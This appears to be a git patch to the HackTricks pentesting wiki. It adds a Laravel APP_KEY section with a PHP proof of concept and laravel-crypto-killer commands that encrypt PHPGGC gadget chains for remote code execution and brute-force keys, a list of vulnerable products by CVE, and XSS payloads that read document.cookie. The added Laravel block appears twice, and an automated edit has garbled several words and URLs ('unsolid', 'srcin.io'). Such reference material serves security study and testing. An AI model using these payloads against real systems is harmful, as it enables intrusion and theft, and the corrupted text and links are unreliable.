From a2418b508aa79f8f4b479d4ba4edc204dccd8d7f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 10 Jul 2025 12:05:16 +0000 Subject: [PATCH] Add content from: Laravel: APP_KEY leakage analysis --- .../partitions-file-systems-carving/README.md | 3 +- .../pentesting-wifi/README.md | 3 +- .../splunk-lpe-and-persistence.md | 7 +- .../ios-pentesting/README.md | 5 +- .../873-pentesting-rsync.md | 3 +- ...entesting-jdwp-java-debug-wire-protocol.md | 3 +- .../pentesting-ntp.md | 38 ++-- .../pentesting-web/laravel.md | 181 +++++++++++++++++- .../rce-with-postgresql-extensions.md | 4 +- .../cloud-ssrf.md | 7 +- .../xss-in-markdown.md | 7 +- src/welcome/hacktricks-values-and-faq.md | 3 +- .../ad-certificates.md | 10 +- .../dpapi-extracting-passwords.md | 28 +-- 14 files changed, 236 insertions(+), 66 deletions(-) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index eae42b9af44..e198cea12f8 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -97,7 +97,7 @@ The partition table header defines the usable blocks on the disk. It also define | Offset | Length | Contents | | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) | +| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#_note-8)on little-endian machines) | | 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 | | 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) | | 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation | @@ -236,4 +236,3 @@ You may notice that even performing that action there might be **other parts whe {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 9cb08d7ede9..058c31a91a4 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -718,7 +718,7 @@ This method allows an **attacker to create a malicious access point (AP) that re ### MANA -Then, **devices started to ignore unsolicited network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solicited by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks. +Then, **devices started to ignore unsolid network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solid by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks. The MANA attack operates by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP. @@ -791,4 +791,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index 3d9ff8e2f5e..264d6043099 100644 --- a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md @@ -41,9 +41,9 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8 **Usable public exploits:** -- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 -- https://www.exploit-db.com/exploits/46238 -- https://www.exploit-db.com/exploits/46487 +- [https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2) +- [https://www.exploit-db.com/exploits/46238](https://www.exploit-db.com/exploits/46238) +- [https://www.exploit-db.com/exploits/46487](https://www.exploit-db.com/exploits/46487) ## Abusing Splunk Queries @@ -52,4 +52,3 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8 {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index bda4fbf3a31..a98928b5f06 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -34,8 +34,8 @@ basic-ios-testing-operations.md Some interesting iOS - IPA files decompilers: -- https://github.com/LaurieWired/Malimite -- https://ghidra-sre.org/ +- [https://github.com/LaurieWired/Malimite](https://github.com/LaurieWired/Malimite) +- [https://ghidra-sre.org/](https://ghidra-sre.org/) It's recommended to use the tool [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) to perform an automatic Static Analysis to the IPA file. @@ -1180,4 +1180,3 @@ otool -L {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/873-pentesting-rsync.md b/src/network-services-pentesting/873-pentesting-rsync.md index 5774606d26c..7216e86159a 100644 --- a/src/network-services-pentesting/873-pentesting-rsync.md +++ b/src/network-services-pentesting/873-pentesting-rsync.md @@ -6,7 +6,7 @@ From [wikipedia](https://en.wikipedia.org/wiki/Rsync): -> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times]()and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. +> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times]()and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. **Default port:** 873 @@ -101,4 +101,3 @@ Within this file, a _secrets file_ parameter might point to a file containing ** {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index dba1d4031ad..c22dd49d210 100644 --- a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -59,7 +59,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi - [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE) - http://www.hsc-news.com/archives/2013/000109.html (no longer active) - [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt) -- https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults +- [https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults](https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults) - [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html) - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com) - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html) @@ -69,4 +69,3 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index c7733a346a5..abf43fe68a6 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -90,12 +90,12 @@ Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, ` | Year | CVE | Component | Impact | |------|-----|-----------|--------| -| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. citeturn1search1turn1search2turn1search0| -| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 – affects port 123 even when NTS **disabled**. citeturn4view0| -| 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) citeturn2search2| -| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. citeturn5search0| +| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. | +| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 – affects port 123 even when NTS **disabled**. | +| 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) | +| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. | -> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins. citeturn1search4 +> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins. --- ## Advanced Attacks @@ -108,11 +108,11 @@ The legacy Mode-7 ``monlist`` query returns up to **600 host addresses** and is - Rate-limit UDP/123 on the edge or enable *sessions-required* on DDoS appliances. - Enable *BCP 38* egress filtering to block source spoofing. -See Cloudflare’s learning-center article for a step-by-step breakdown. citeturn5search1 +See Cloudflare’s learning-center article for a step-by-step breakdown. ### 2. Time-Shift / Delay attacks (Khronos / Chronos research) -Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``). citeturn9search1 +Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``). ### 3. NTS abuse & 4460/tcp exposure @@ -126,7 +126,7 @@ nmap -sV -p 4460 --script ssl-enum-ciphers,ssl-cert openssl s_client -connect :4460 -alpn ntske/1 -tls1_3 -ign_eof ``` -Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4. citeturn11search0 +Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4. --- ## Hardening / Best-Current-Practice (BCP-233 / RFC 8633) @@ -139,7 +139,7 @@ Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). 4. Consider **leap-smear** to avoid leap-second outages, but ensure *all* downstream clients use the same smear window. 5. Keep polling ≤24 h so leap-second flags are not missed. -See RFC 8633 for a comprehensive checklist. citeturn8search0turn8search1 +See RFC 8633 for a comprehensive checklist. --- ## Shodan / Censys Dorks @@ -185,14 +185,14 @@ Entry_2: --- ## References -- RFC 8915 – *Network Time Security for the Network Time Protocol* (port 4460) citeturn11search0 -- RFC 8633 – *Network Time Protocol BCP* citeturn8search0 -- Cloudflare DDoS report 2024 Q4 (5.6 Tbps) citeturn5search0 -- Cloudflare *NTP Amplification Attack* article citeturn5search1 -- NTP 4.2.8p15 CVE series 2023-04 citeturn1search4 -- NVD entries **CVE-2023-26551–55**, **CVE-2023-33192** citeturn1search1turn1search2turn1search0turn4view0 -- SUSE chrony security update 2024 (chrony 4.5) citeturn2search2 -- Khronos/Chronos draft (time-shift mitigation) citeturn9search1 -- chronyc manual/examples for remote monitoring citeturn3search0turn10search1 -- zgrab2 ntp module docs citeturn7search0 +- RFC 8915 – *Network Time Security for the Network Time Protocol* (port 4460) +- RFC 8633 – *Network Time Protocol BCP* +- Cloudflare DDoS report 2024 Q4 (5.6 Tbps) +- Cloudflare *NTP Amplification Attack* article +- NTP 4.2.8p15 CVE series 2023-04 +- NVD entries **CVE-2023-26551–55**, **CVE-2023-33192** +- SUSE chrony security update 2024 (chrony 4.5) +- Khronos/Chronos draft (time-shift mitigation) +- chronyc manual/examples for remote monitoring +- zgrab2 ntp module docs {{#include /banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index c7e66f5558f..0763e46f8ab 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,5 +1,96 @@ # Laravel +{{#include /banners/hacktricks-training.md}} + +### Laravel SQLInjection + +Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`). +The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like: + +```json +{ + "iv" : "Base64(random 16-byte IV)", + "value": "Base64(ciphertext)", + "mac" : "HMAC_SHA256(iv||value, APP_KEY)", + "tag" : "" // only used for AEAD ciphers (GCM) +} +``` + +`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas +`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value. +Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode: + +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` + +The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field. + +--- + +## Real-world vulnerable patterns + +| Project | Vulnerable sink | Gadget chain | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | + +The exploitation workflow is always: +1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) +2. Generate gadget with **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Deliver payload through the vulnerable parameter/cookie → **RCE** + +--- + +## Mass APP_KEY discovery via cookie brute-force + +Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline. + +Key findings of the research published by Synacktiv (2024-2025): +* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). + +The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes. + +--- + +## References +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}} @@ -101,7 +192,95 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) -{{#include ../../banners/hacktricks-training.md}} +### Laravel SQLInjection + +Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`). +The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like: + +```json +{ + "iv" : "Base64(random 16-byte IV)", + "value": "Base64(ciphertext)", + "mac" : "HMAC_SHA256(iv||value, APP_KEY)", + "tag" : "" // only used for AEAD ciphers (GCM) +} +``` + +`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas +`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value. +Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode: + +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` + +The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field. + +--- + +## Real-world vulnerable patterns + +| Project | Vulnerable sink | Gadget chain | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | + +The exploitation workflow is always: +1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) +2. Generate gadget with **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Deliver payload through the vulnerable parameter/cookie → **RCE** + +--- + +## Mass APP_KEY discovery via cookie brute-force + +Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline. + +Key findings of the research published by Synacktiv (2024-2025): +* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). + +The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes. + +--- + +## References +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index a661c75e22a..f57342ec38b 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -307,8 +307,8 @@ select connect_back('192.168.100.54', 1234); _Note that you don't need to append the `.dll` extension as the create function will add it._ -For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\ -In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\ +For more information **read the**[ **original publication here**](https://srcin.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\ +In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourcein/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\ In the same page this **exploit to automate** this technique was given: ```python diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 406ebfbbea1..9bffa568484 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -153,9 +153,9 @@ You can [**find here the docs about metadata endpoints**](https://cloud.google.c Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: -- http://169.254.169.254 -- http://metadata.google.internal -- http://metadata +- [http://169.254.169.254](http://169.254.169.254) +- [http://metadata.google.internal](http://metadata.google.internal) +- [http://metadata](http://metadata) Interesting endpoints to extract information: @@ -646,4 +646,3 @@ Rancher's metadata can be accessed using: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md index 4d63564dab2..824765c2f60 100644 --- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md +++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md @@ -95,8 +95,8 @@ Payloads example: ```html [a](javascript:prompt(document.cookie)) @@ -108,7 +108,7 @@ Fuzzing examples from [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:alert('XSS')) ![a'"`onerror=prompt(document.cookie)](x)\ -[citelol]: (javascript:prompt(document.cookie)) +[lol]: (javascript:prompt(document.cookie)) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [test](javascript://%0d%0aprompt(1)) [test](javascript://%0d%0aprompt(1);com) @@ -171,4 +171,3 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index 059ab014603..798a806bffe 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) were you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -145,4 +145,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} - diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md index 0ad4b624a5f..a12d10bc5f1 100644 --- a/src/windows-hardening/active-directory-methodology/ad-certificates.md +++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md @@ -130,9 +130,9 @@ certutil -v -dstemplate | Year | ID / Name | Impact | Key Take-aways | |------|-----------|--------|----------------| -| 2022 | **CVE-2022-26923** – “Certifried” / ESC6 | *Privilege escalation* by spoofing machine account certificates during PKINIT. | Patch is included in the **May 10 2022** security updates. Auditing & strong-mapping controls were introduced via **KB5014754**; environments should now be in *Full Enforcement* mode. citeturn2search0 | -| 2023 | **CVE-2023-35350 / 35351** | *Remote code-execution* in the AD CS Web Enrollment (certsrv) and CES roles. | Public PoCs are limited, but the vulnerable IIS components are often exposed internally. Patch as of **July 2023** Patch Tuesday. citeturn3search0 | -| 2024 | **CVE-2024-49019** – “EKUwu” / ESC15 | Low-privileged users with enrollment rights could override **any** EKU or SAN during CSR generation, issuing certificates usable for client-authentication or code-signing and leading to *domain compromise*. | Addressed in **April 2024** updates. Remove “Supply in the request” from templates and restrict enrollment permissions. citeturn1search3 | +| 2022 | **CVE-2022-26923** – “Certifried” / ESC6 | *Privilege escalation* by spoofing machine account certificates during PKINIT. | Patch is included in the **May 10 2022** security updates. Auditing & strong-mapping controls were introduced via **KB5014754**; environments should now be in *Full Enforcement* mode. | +| 2023 | **CVE-2023-35350 / 35351** | *Remote code-execution* in the AD CS Web Enrollment (certsrv) and CES roles. | Public PoCs are limited, but the vulnerable IIS components are often exposed internally. Patch as of **July 2023** Patch Tuesday. | +| 2024 | **CVE-2024-49019** – “EKUwu” / ESC15 | Low-privileged users with enrollment rights could override **any** EKU or SAN during CSR generation, issuing certificates usable for client-authentication or code-signing and leading to *domain compromise*. | Addressed in **April 2024** updates. Remove “Supply in the request” from templates and restrict enrollment permissions. | ### Microsoft hardening timeline (KB5014754) @@ -140,13 +140,13 @@ Microsoft introduced a three-phase rollout (Compatibility → Audit → Enforcem 1. Patch all DCs & AD CS servers (May 2022 or later). 2. Monitor Event ID 39/41 for weak mappings during the *Audit* phase. -3. Re-issue client-auth certificates with the new **SID extension** or configure strong manual mappings before February 2025. citeturn2search0 +3. Re-issue client-auth certificates with the new **SID extension** or configure strong manual mappings before February 2025. --- ## Detection & Hardening Enhancements -* **Defender for Identity AD CS sensor (2023-2024)** now surfaces posture assessments for ESC1-ESC8/ESC11 and generates real-time alerts such as *“Domain-controller certificate issuance for a non-DC”* (ESC8) and *“Prevent Certificate Enrollment with arbitrary Application Policies”* (ESC15). Ensure sensors are deployed to all AD CS servers to benefit from these detections. citeturn5search0 +* **Defender for Identity AD CS sensor (2023-2024)** now surfaces posture assessments for ESC1-ESC8/ESC11 and generates real-time alerts such as *“Domain-controller certificate issuance for a non-DC”* (ESC8) and *“Prevent Certificate Enrollment with arbitrary Application Policies”* (ESC15). Ensure sensors are deployed to all AD CS servers to benefit from these detections. * Disable or tightly 